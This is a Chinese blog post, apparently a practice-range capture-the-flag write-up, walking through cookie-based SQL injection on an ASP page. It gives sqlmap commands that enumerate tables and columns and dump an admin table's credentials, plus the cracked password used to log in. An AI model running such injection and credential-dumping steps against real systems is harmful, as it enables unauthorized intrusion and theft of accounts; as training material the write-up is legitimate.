sqlmap之cookie注入(靶场第二题)

sqlmap
靶场第二题:https://hack.zkaq.org/?a=battle&f=target&id=31ac789a52edf9bb
首先我们尝试下sql注入

http://120.203.13.75:8001/shownews.asp?id=171%20and%201=1

sqlmap之cookie注入(靶场第二题)_第1张图片
说明该网站有防sql注入。那么我们使用cookie注入

http://120.203.13.75:8001/shownews.asp?id=171%20order%20by%2010

sqlmap之cookie注入(靶场第二题)_第2张图片
第一步
猜解表

sqlmap -u "http://120.203.13.75:8001/shownews.asp?" --cookie "id=171" --table --level 2

sqlmap之cookie注入(靶场第二题)_第3张图片
第二步,猜字段

 sqlmap -u "http://120.203.13.75:8001/shownews.asp?" --cookie "id=171" --column -T admin --level 2

sqlmap之cookie注入(靶场第二题)_第4张图片
第三步,爆数据

sqlmap -u "http://120.203.13.75:8001/shownews.asp?" --cookie "id=171"  --dump  -T admin -C "username,password" --level 2

sqlmap之cookie注入(靶场第二题)_第5张图片
b9a2a2b5dffb918c,该密码是md5加密,百度搜索md5在线加密
sqlmap之cookie注入(靶场第二题)_第6张图片
我们已经拿到密码了
进入后台网站,利用御剑工作扫出后台
sqlmap之cookie注入(靶场第二题)_第7张图片
http://120.203.13.75:8001/admin
输入账号admin,密码welcome获取flag
在这里插入图片描述

你可能感兴趣的:(web安全)